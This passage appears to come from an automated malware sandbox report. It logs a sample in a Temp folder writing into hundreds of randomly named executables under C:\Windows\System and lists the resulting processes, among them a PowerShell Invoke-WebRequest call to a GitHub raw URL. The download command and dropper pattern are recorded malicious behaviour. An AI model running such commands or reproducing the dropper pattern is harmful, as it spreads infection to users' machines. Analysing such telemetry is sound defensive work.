PID 2928 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\KRiNZZp.exe
PID 2928 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\TIWsFDf.exe
PID 2928 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\TIWsFDf.exe
PID 2928 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\TIWsFDf.exe
PID 2928 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\hXsTflt.exe
PID 2928 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\hXsTflt.exe
PID 2928 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\hXsTflt.exe
PID 2928 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\seKOSuA.exe
PID 2928 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\seKOSuA.exe
PID 2928 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\seKOSuA.exe
PID 2928 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\HFSGnQP.exe
PID 2928 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\HFSGnQP.exe
PID 2928 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\HFSGnQP.exe
PID 2928 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\JnefrXJ.exe
PID 2928 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\JnefrXJ.exe
PID 2928 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\JnefrXJ.exe
PID 2928 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\RKjJVMS.exe
PID 2928 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\RKjJVMS.exe
PID 2928 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\RKjJVMS.exe
PID 2928 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\SyEIImC.exe
PID 2928 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\SyEIImC.exe
PID 2928 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\SyEIImC.exe
PID 2928 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\YokvJNy.exe
PID 2928 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\YokvJNy.exe
PID 2928 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\YokvJNy.exe
PID 2928 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\AayZXHV.exe
PID 2928 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\AayZXHV.exe
PID 2928 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\AayZXHV.exe
PID 2928 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\SGUyGDO.exe
PID 2928 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\SGUyGDO.exe
PID 2928 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\SGUyGDO.exe
PID 2928 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\WiVyPKP.exe
PID 2928 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\WiVyPKP.exe
PID 2928 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\WiVyPKP.exe
PID 2928 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\bWaLAtG.exe
PID 2928 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\bWaLAtG.exe
PID 2928 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\bWaLAtG.exe
PID 2928 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\fBfEBeF.exe
PID 2928 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\fBfEBeF.exe
PID 2928 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\fBfEBeF.exe
PID 2928 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\zGcQlbp.exe
PID 2928 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\zGcQlbp.exe
PID 2928 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\zGcQlbp.exe
PID 2928 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\UpoUfzq.exe
PID 2928 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\UpoUfzq.exe
PID 2928 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\UpoUfzq.exe
PID 2928 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\hPtQwZO.exe
PID 2928 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\hPtQwZO.exe
PID 2928 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\hPtQwZO.exe
PID 2928 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe C:\Windows\System\WQVgMPI.exe

Processes

C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\oDPBQIQ.exe

C:\Windows\System\oDPBQIQ.exe

C:\Windows\System\tqhAMxb.exe

C:\Windows\System\tqhAMxb.exe

C:\Windows\System\POdHwHR.exe

C:\Windows\System\POdHwHR.exe

C:\Windows\System\KRiNZZp.exe

C:\Windows\System\KRiNZZp.exe

C:\Windows\System\TIWsFDf.exe

C:\Windows\System\TIWsFDf.exe

C:\Windows\System\hXsTflt.exe

C:\Windows\System\hXsTflt.exe

C:\Windows\System\seKOSuA.exe

C:\Windows\System\seKOSuA.exe

C:\Windows\System\HFSGnQP.exe

C:\Windows\System\HFSGnQP.exe

C:\Windows\System\JnefrXJ.exe

C:\Windows\System\JnefrXJ.exe

C:\Windows\System\RKjJVMS.exe

C:\Windows\System\RKjJVMS.exe

C:\Windows\System\SyEIImC.exe

C:\Windows\System\SyEIImC.exe

C:\Windows\System\YokvJNy.exe

C:\Windows\System\YokvJNy.exe

C:\Windows\System\AayZXHV.exe

C:\Windows\System\AayZXHV.exe

C:\Windows\System\SGUyGDO.exe

C:\Windows\System\SGUyGDO.exe

C:\Windows\System\WiVyPKP.exe

C:\Windows\System\WiVyPKP.exe

C:\Windows\System\bWaLAtG.exe

C:\Windows\System\bWaLAtG.exe

C:\Windows\System\fBfEBeF.exe

C:\Windows\System\fBfEBeF.exe

C:\Windows\System\zGcQlbp.exe

C:\Windows\System\zGcQlbp.exe

C:\Windows\System\UpoUfzq.exe

C:\Windows\System\UpoUfzq.exe

C:\Windows\System\hPtQwZO.exe

C:\Windows\System\hPtQwZO.exe

C:\Windows\System\WQVgMPI.exe

C:\Windows\System\WQVgMPI.exe

C:\Windows\System\AsmAnry.exe

C:\Windows\System\AsmAnry.exe

C:\Windows\System\qbtqdta.exe

C:\Windows\System\qbtqdta.exe

C:\Windows\System\PafKfmd.exe

C:\Windows\System\PafKfmd.exe

C:\Windows\System\yjySaDz.exe

C:\Windows\System\yjySaDz.exe

C:\Windows\System\wYazokD.exe

C:\Windows\System\wYazokD.exe

C:\Windows\System\SLDZdsd.exe

C:\Windows\System\SLDZdsd.exe

C:\Windows\System\PQfanMj.exe

C:\Windows\System\PQfanMj.exe

C:\Windows\System\kCbWrSz.exe

C:\Windows\System\kCbWrSz.exe

C:\Windows\System\KrGWRBQ.exe

C:\Windows\System\KrGWRBQ.exe

C:\Windows\System\CHfzTcE.exe

C:\Windows\System\CHfzTcE.exe

C:\Windows\System\ZSubHxO.exe

C:\Windows\System\ZSubHxO.exe

C:\Windows\System\BBcQHAC.exe

C:\Windows\System\BBcQHAC.exe

C:\Windows\System\ehzPLUN.exe

C:\Windows\System\ehzPLUN.exe

C:\Windows\System\eeXwOVL.exe

C:\Windows\System\eeXwOVL.exe

C:\Windows\System\FfwQfjL.exe

C:\Windows\System\FfwQfjL.exe

C:\Windows\System\VZWDNMY.exe

C:\Windows\System\VZWDNMY.exe

C:\Windows\System\iCfNnpz.exe

C:\Windows\System\iCfNnpz.exe

C:\Windows\System\zzSgnzA.exe

C:\Windows\System\zzSgnzA.exe

C:\Windows\System\fhTbUIM.exe

C:\Windows\System\fhTbUIM.exe

C:\Windows\System\GxWryjP.exe

C:\Windows\System\GxWryjP.exe

C:\Windows\System\mlcBZIT.exe

C:\Windows\System\mlcBZIT.exe

C:\Windows\System\pGkFRLR.exe

C:\Windows\System\pGkFRLR.exe

C:\Windows\System\TgfZPAi.exe

C:\Windows\System\TgfZPAi.exe

C:\Windows\System\jqIuthj.exe

C:\Windows\System\jqIuthj.exe

C:\Windows\System\xlXzCLF.exe

C:\Windows\System\xlXzCLF.exe

C:\Windows\System\flrhmyV.exe

C:\Windows\System\flrhmyV.exe

C:\Windows\System\HDGYFRc.exe

C:\Windows\System\HDGYFRc.exe

C:\Windows\System\csEOIDm.exe

C:\Windows\System\csEOIDm.exe

C:\Windows\System\lRInIVx.exe

C:\Windows\System\lRInIVx.exe

C:\Windows\System\aOWCwSB.exe

C:\Windows\System\aOWCwSB.exe

C:\Windows\System\anBGYdE.exe

C:\Windows\System\anBGYdE.exe

C:\Windows\System\fBBmzTo.exe

C:\Windows\System\fBBmzTo.exe

C:\Windows\System\uPJBrYP.exe

C:\Windows\System\uPJBrYP.exe

C:\Windows\System\FDJnmrP.exe

C:\Windows\System\FDJnmrP.exe

C:\Windows\System\geDuKSP.exe

C:\Windows\System\geDuKSP.exe

C:\Windows\System\gCfOCLc.exe

C:\Windows\System\gCfOCLc.exe

C:\Windows\System\DSrpTra.exe

C:\Windows\System\DSrpTra.exe

C:\Windows\System\bfCggbx.exe

C:\Windows\System\bfCggbx.exe

C:\Windows\System\kznAyWV.exe

C:\Windows\System\kznAyWV.exe

C:\Windows\System\AenWSLa.exe

C:\Windows\System\AenWSLa.exe

C:\Windows\System\Pngmqig.exe

C:\Windows\System\Pngmqig.exe

C:\Windows\System\QEJZoss.exe

C:\Windows\System\QEJZoss.exe

C:\Windows\System\pzXOesv.exe

C:\Windows\System\pzXOesv.exe

C:\Windows\System\cObxxzr.exe

C:\Windows\System\cObxxzr.exe

C:\Windows\System\TePLBbT.exe

C:\Windows\System\TePLBbT.exe

C:\Windows\System\RocmBoA.exe

C:\Windows\System\RocmBoA.exe

C:\Windows\System\LQogQYD.exe

C:\Windows\System\LQogQYD.exe

C:\Windows\System\ePvxbUH.exe

C:\Windows\System\ePvxbUH.exe

C:\Windows\System\uzRBJvn.exe

C:\Windows\System\uzRBJvn.exe

C:\Windows\System\czUXrGK.exe

C:\Windows\System\czUXrGK.exe

C:\Windows\System\pgWFLjF.exe

C:\Windows\System\pgWFLjF.exe

C:\Windows\System\qAhpNec.exe

C:\Windows\System\qAhpNec.exe

C:\Windows\System\LzZuLmt.exe

C:\Windows\System\LzZuLmt.exe

C:\Windows\System\XAuhgvp.exe

C:\Windows\System\XAuhgvp.exe

C:\Windows\System\oJjTLMC.exe

C:\Windows\System\oJjTLMC.exe

C:\Windows\System\FpIfPHU.exe

C:\Windows\System\FpIfPHU.exe

C:\Windows\System\fHOzvqL.exe

C:\Windows\System\fHOzvqL.exe

C:\Windows\System\MjEJrRk.exe

C:\Windows\System\MjEJrRk.exe

C:\Windows\System\wUqCdeq.exe

C:\Windows\System\wUqCdeq.exe

C:\Windows\System\fIavuQP.exe

C:\Windows\System\fIavuQP.exe

C:\Windows\System\NERMCCy.exe

C:\Windows\System\NERMCCy.exe

C:\Windows\System\tHZSjoC.exe

C:\Windows\System\tHZSjoC.exe

C:\Windows\System\UJNMpwu.exe

C:\Windows\System\UJNMpwu.exe

C:\Windows\System\spJFOor.exe

C:\Windows\System\spJFOor.exe

C:\Windows\System\lshQtFP.exe

C:\Windows\System\lshQtFP.exe

C:\Windows\System\XGYuPZB.exe

C:\Windows\System\XGYuPZB.exe

C:\Windows\System\tAKWgyv.exe

C:\Windows\System\tAKWgyv.exe

C:\Windows\System\MKhvVbv.exe

C:\Windows\System\MKhvVbv.exe

C:\Windows\System\MZNiUtb.exe

C:\Windows\System\MZNiUtb.exe

C:\Windows\System\dZBIrIK.exe

C:\Windows\System\dZBIrIK.exe

C:\Windows\System\oailaff.exe

C:\Windows\System\oailaff.exe

C:\Windows\System\xnoBojq.exe

C:\Windows\System\xnoBojq.exe

C:\Windows\System\rFcSEUi.exe

C:\Windows\System\rFcSEUi.exe

C:\Windows\System\wEdRgOw.exe

C:\Windows\System\wEdRgOw.exe

C:\Windows\System\WlldcyB.exe

C:\Windows\System\WlldcyB.exe

C:\Windows\System\DLUcSrm.exe

C:\Windows\System\DLUcSrm.exe

C:\Windows\System\SBeunCI.exe

C:\Windows\System\SBeunCI.exe

C:\Windows\System\HbDDvnY.exe

C:\Windows\System\HbDDvnY.exe

C:\Windows\System\MVrCRhS.exe

C:\Windows\System\MVrCRhS.exe

C:\Windows\System\xmCyVLA.exe

C:\Windows\System\xmCyVLA.exe

C:\Windows\System\pcAuHXd.exe

C:\Windows\System\pcAuHXd.exe

C:\Windows\System\WZjiOhG.exe

C:\Windows\System\WZjiOhG.exe

C:\Windows\System\PfhikUs.exe

C:\Windows\System\PfhikUs.exe

C:\Windows\System\vbDVkAx.exe

C:\Windows\System\vbDVkAx.exe

C:\Windows\System\RLpNpxm.exe

C:\Windows\System\RLpNpxm.exe

C:\Windows\System\nyBwajA.exe

C:\Windows\System\nyBwajA.exe

C:\Windows\System\SVDmVlJ.exe

C:\Windows\System\SVDmVlJ.exe

C:\Windows\System\KhnlFVY.exe

C:\Windows\System\KhnlFVY.exe

C:\Windows\System\ByQWlTF.exe

C:\Windows\System\ByQWlTF.exe

C:\Windows\System\blWYlxo.exe

C:\Windows\System\blWYlxo.exe

C:\Windows\System\mjGpHQc.exe

C:\Windows\System\mjGpHQc.exe

C:\Windows\System\uOQMUId.exe

C:\Windows\System\uOQMUId.exe

C:\Windows\System\mUjfOtE.exe

C:\Windows\System\mUjfOtE.exe

C:\Windows\System\yzwcnnY.exe

C:\Windows\System\yzwcnnY.exe

C:\Windows\System\TYhdsvB.exe

C:\Windows\System\TYhdsvB.exe

C:\Windows\System\WQciffb.exe

C:\Windows\System\WQciffb.exe

C:\Windows\System\xyqvkZp.exe

C:\Windows\System\xyqvkZp.exe

C:\Windows\System\JOGEyBV.exe

C:\Windows\System\JOGEyBV.exe

C:\Windows\System\pbkCnCD.exe

C:\Windows\System\pbkCnCD.exe

C:\Windows\System\uFgwyYr.exe

C:\Windows\System\uFgwyYr.exe

C:\Windows\System\bkRWcee.exe

C:\Windows\System\bkRWcee.exe

C:\Windows\System\maTVLNW.exe

C:\Windows\System\maTVLNW.exe

C:\Windows\System\oGUpeKF.exe

C:\Windows\System\oGUpeKF.exe

C:\Windows\System\wUqBPhP.exe

C:\Windows\System\wUqBPhP.exe

C:\Windows\System\NWFYNiR.exe

C:\Windows\System\NWFYNiR.exe

C:\Windows\System\AcHGLuG.exe

C:\Windows\System\AcHGLuG.exe

C:\Windows\System\LIRvUne.exe

C:\Windows\System\LIRvUne.exe

C:\Windows\System\knPQDEo.exe

C:\Windows\System\knPQDEo.exe

C:\Windows\System\ZJLedqg.exe

C:\Windows\System\ZJLedqg.exe

C:\Windows\System\VgtpxPn.exe

C:\Windows\System\VgtpxPn.exe

C:\Windows\System\EBUqtlo.exe

C:\Windows\System\EBUqtlo.exe

C:\Windows\System\nmHKRic.exe

C:\Windows\System\nmHKRic.exe

C:\Windows\System\jhmQgRL.exe

C:\Windows\System\jhmQgRL.exe

C:\Windows\System\fJAJCtH.exe

C:\Windows\System\fJAJCtH.exe

C:\Windows\System\MmstnTP.exe

C:\Windows\System\MmstnTP.exe

C:\Windows\System\Hbcdcpy.exe

C:\Windows\System\Hbcdcpy.exe

C:\Windows\System\HTpcYFQ.exe

C:\Windows\System\HTpcYFQ.exe

C:\Windows\System\VNRmgWB.exe

C:\Windows\System\VNRmgWB.exe

C:\Windows\System\foOtuOp.exe

C:\Windows\System\foOtuOp.exe

C:\Windows\System\frhqbcc.exe

C:\Windows\System\frhqbcc.exe

C:\Windows\System\TuAPLYz.exe

C:\Windows\System\TuAPLYz.exe

C:\Windows\System\iFcOJUE.exe

C:\Windows\System\iFcOJUE.exe

C:\Windows\System\kMZtGQD.exe

C:\Windows\System\kMZtGQD.exe

C:\Windows\System\vBGhQII.exe

C:\Windows\System\vBGhQII.exe

C:\Windows\System\YKpczOv.exe

C:\Windows\System\YKpczOv.exe

C:\Windows\System\cscdeBA.exe

C:\Windows\System\cscdeBA.exe

C:\Windows\System\vIxeIGQ.exe

C:\Windows\System\vIxeIGQ.exe

C:\Windows\System\MZXrkLr.exe

C:\Windows\System\MZXrkLr.exe

C:\Windows\System\SamWcJP.exe

C:\Windows\System\SamWcJP.exe

C:\Windows\System\LCPoQMK.exe

C:\Windows\System\LCPoQMK.exe

C:\Windows\System\EVxyVTd.exe

C:\Windows\System\EVxyVTd.exe

C:\Windows\System\xeoWxpN.exe

C:\Windows\System\xeoWxpN.exe

C:\Windows\System\xZWBjys.exe

C:\Windows\System\xZWBjys.exe

C:\Windows\System\xKtToMK.exe

C:\Windows\System\xKtToMK.exe

C:\Windows\System\keRXWdL.exe

C:\Windows\System\keRXWdL.exe

C:\Windows\System\gIVcQZa.exe

C:\Windows\System\gIVcQZa.exe

C:\Windows\System\FRrFNmm.exe

C:\Windows\System\FRrFNmm.exe

C:\Windows\System\GTctCTb.exe

C:\Windows\System\GTctCTb.exe

C:\Windows\System\pgiMMkJ.exe

C:\Windows\System\pgiMMkJ.exe

C:\Windows\System\FmZunYJ.exe

C:\Windows\System\FmZunYJ.exe

C:\Windows\System\IXLxjaX.exe

C:\Windows\System\IXLxjaX.exe

C:\Windows\System\SjWfAix.exe

C:\Windows\System\SjWfAix.exe

C:\Windows\System\XYnXQbc.exe

C:\Windows\System\XYnXQbc.exe

C:\Windows\System\nGpehAV.exe

C:\Windows\System\nGpehAV.exe

C:\Windows\System\LsKwlRL.exe

C:\Windows\System\LsKwlRL.exe

C:\Windows\System\GUBRqWu.exe

C:\Windows\System\GUBRqWu.exe

C:\Windows\System\VNpNoEo.exe

C:\Windows\System\VNpNoEo.exe

C:\Windows\System\TjEKUFm.exe

C:\Windows\System\TjEKUFm.exe

C:\Windows\System\dtdAgzW.exe

C:\Windows\System\dtdAgzW.exe

C:\Windows\System\mwIXoME.exe

C:\Windows\System\mwIXoME.exe

C:\Windows\System\pwFlVVP.exe

C:\Windows\System\pwFlVVP.exe

C:\Windows\System\fCuTRji.exe

C:\Windows\System\fCuTRji.exe

C:\Windows\System\JhtytTw.exe

C:\Windows\System\JhtytTw.exe

C:\Windows\System\jCSsWqI.exe

C:\Windows\System\jCSsWqI.exe

C:\Windows\System\upgmOkZ.exe

C:\Windows\System\upgmOkZ.exe

C:\Windows\System\MmcJawk.exe

C:\Windows\System\MmcJawk.exe

C:\Windows\System\YJEnnJD.exe

C:\Windows\System\YJEnnJD.exe

C:\Windows\System\DoxPrmg.exe

C:\Windows\System\DoxPrmg.exe

C:\Windows\System\rtODOJE.exe

C:\Windows\System\rtODOJE.exe

C:\Windows\System\TOWtzkn.exe

C:\Windows\System\TOWtzkn.exe

C:\Windows\System\UnyQuxK.exe

C:\Windows\System\UnyQuxK.exe

C:\Windows\System\deofDpe.exe

C:\Windows\System\deofDpe.exe

C:\Windows\System\LAQbrwD.exe

C:\Windows\System\LAQbrwD.exe

C:\Windows\System\bhZBDkZ.exe

C:\Windows\System\bhZBDkZ.exe

C:\Windows\System\dKBEVSP.exe

C:\Windows\System\dKBEVSP.exe

C:\Windows\System\HMLiikv.exe

C:\Windows\System\HMLiikv.exe

C:\Windows\System\ASenLGE.exe

C:\Windows\System\ASenLGE.exe

C:\Windows\System\NoYhAnR.exe

C:\Windows\System\NoYhAnR.exe

C:\Windows\System\ymGAvOd.exe

C:\Windows\System\ymGAvOd.exe

C:\Windows\System\YRaBNDr.exe

C:\Windows\System\YRaBNDr.exe

C:\Windows\System\GVaIHre.exe

C:\Windows\System\GVaIHre.exe

C:\Windows\System\sZZBHxI.exe

C:\Windows\System\sZZBHxI.exe

C:\Windows\System\WzaFJeJ.exe

C:\Windows\System\WzaFJeJ.exe

C:\Windows\System\PPmcCSy.exe

C:\Windows\System\PPmcCSy.exe

C:\Windows\System\RjsZrCj.exe

C:\Windows\System\RjsZrCj.exe

C:\Windows\System\dnJQjlR.exe

C:\Windows\System\dnJQjlR.exe

C:\Windows\System\Dnoepil.exe

C:\Windows\System\Dnoepil.exe

C:\Windows\System\WNYqDnX.exe

C:\Windows\System\WNYqDnX.exe

C:\Windows\System\UkKkjQe.exe

C:\Windows\System\UkKkjQe.exe

C:\Windows\System\LWnKJDa.exe

C:\Windows\System\LWnKJDa.exe

C:\Windows\System\IqpZBmc.exe

C:\Windows\System\IqpZBmc.exe

C:\Windows\System\ZBUzzRB.exe

C:\Windows\System\ZBUzzRB.exe

C:\Windows\System\xvxVSED.exe

C:\Windows\System\xvxVSED.exe

C:\Windows\System\fYVYKKk.exe

C:\Windows\System\fYVYKKk.exe

C:\Windows\System\TZgYrRN.exe

C:\Windows\System\TZgYrRN.exe

C:\Windows\System\kIgqphC.exe

C:\Windows\System\kIgqphC.exe

C:\Windows\System\VUnYaug.exe

C:\Windows\System\VUnYaug.exe

C:\Windows\System\KHqANsM.exe

C:\Windows\System\KHqANsM.exe

C:\Windows\System\xjzUcvY.exe

C:\Windows\System\xjzUcvY.exe

C:\Windows\System\EACXVYS.exe

C:\Windows\System\EACXVYS.exe

C:\Windows\System\tMODFkp.exe

C:\Windows\System\tMODFkp.exe

C:\Windows\System\Stcgiif.exe

C:\Windows\System\Stcgiif.exe

C:\Windows\System\WhjuaNd.exe

C:\Windows\System\WhjuaNd.exe

C:\Windows\System\nWYYqKa.exe

C:\Windows\System\nWYYqKa.exe

C:\Windows\System\RFWjpFl.exe

C:\Windows\System\RFWjpFl.exe

C:\Windows\System\bbEQoLm.exe

C:\Windows\System\bbEQoLm.exe

C:\Windows\System\oEipOZl.exe

C:\Windows\System\oEipOZl.exe

C:\Windows\System\iRAyFeL.exe

C:\Windows\System\iRAyFeL.exe

C:\Windows\System\kaRHkOF.exe

C:\Windows\System\kaRHkOF.exe

C:\Windows\System\cYYLVAS.exe

C:\Windows\System\cYYLVAS.exe

C:\Windows\System\SdWHHjV.exe

C:\Windows\System\SdWHHjV.exe

C:\Windows\System\MyrbqgR.exe

C:\Windows\System\MyrbqgR.exe

C:\Windows\System\yuuXMby.exe

C:\Windows\System\yuuXMby.exe

C:\Windows\System\aeqqagW.exe

C:\Windows\System\aeqqagW.exe

C:\Windows\System\LBTFnGW.exe

C:\Windows\System\LBTFnGW.exe

C:\Windows\System\nCoqIWn.exe

C:\Windows\System\nCoqIWn.exe

C:\Windows\System\lZjWpXx.exe

C:\Windows\System\lZjWpXx.exe

C:\Windows\System\yJDxYWy.exe

C:\Windows\System\yJDxYWy.exe

C:\Windows\System\ehctVZH.exe

C:\Windows\System\ehctVZH.exe

C:\Windows\System\gIHfHOJ.exe

C:\Windows\System\gIHfHOJ.exe

C:\Windows\System\NOQpDVO.exe

C:\Windows\System\NOQpDVO.exe

C:\Windows\System\XnCpWQe.exe

C:\Windows\System\XnCpWQe.exe

C:\Windows\System\buAcjCL.exe

C:\Windows\System\buAcjCL.exe

C:\Windows\System\HOmaIaE.exe

C:\Windows\System\HOmaIaE.exe

C:\Windows\System\sITKSYA.exe

C:\Windows\System\sITKSYA.exe

C:\Windows\System\CTWNopN.exe

C:\Windows\System\CTWNopN.exe

C:\Windows\System\RxOdSxZ.exe

C:\Windows\System\RxOdSxZ.exe

C:\Windows\System\uczjNIk.exe

C:\Windows\System\uczjNIk.exe

C:\Windows\System\kzVrsaX.exe

C:\Windows\System\kzVrsaX.exe

C:\Windows\System\leADVHU.exe

C:\Windows\System\leADVHU.exe

C:\Windows\System\niszbbX.exe

C:\Windows\System\niszbbX.exe

C:\Windows\System\CEwpadk.exe

C:\Windows\System\CEwpadk.exe

C:\Windows\System\gkDaZSX.exe

C:\Windows\System\gkDaZSX.exe

C:\Windows\System\SWqZaSL.exe

C:\Windows\System\SWqZaSL.exe

C:\Windows\System\OoMwCNW.exe

C:\Windows\System\OoMwCNW.exe

C:\Windows\System\hbqEmdi.exe

C:\Windows\System\hbqEmdi.exe

C:\Windows\System\ncyPoid.exe

C:\Windows\System\ncyPoid.exe

C:\Windows\System\ozPLuDB.exe

C:\Windows\System\ozPLuDB.exe

C:\Windows\System\ZullqvV.exe

C:\Windows\System\ZullqvV.exe

C:\Windows\System\CdFjBlo.exe

C:\Windows\System\CdFjBlo.exe

C:\Windows\System\rfckiJN.exe

C:\Windows\System\rfckiJN.exe

C:\Windows\System\gDcYMbI.exe

C:\Windows\System\gDcYMbI.exe

C:\Windows\System\HzgmucD.exe

C:\Windows\System\HzgmucD.exe

C:\Windows\System\PfqHTmm.exe

C:\Windows\System\PfqHTmm.exe

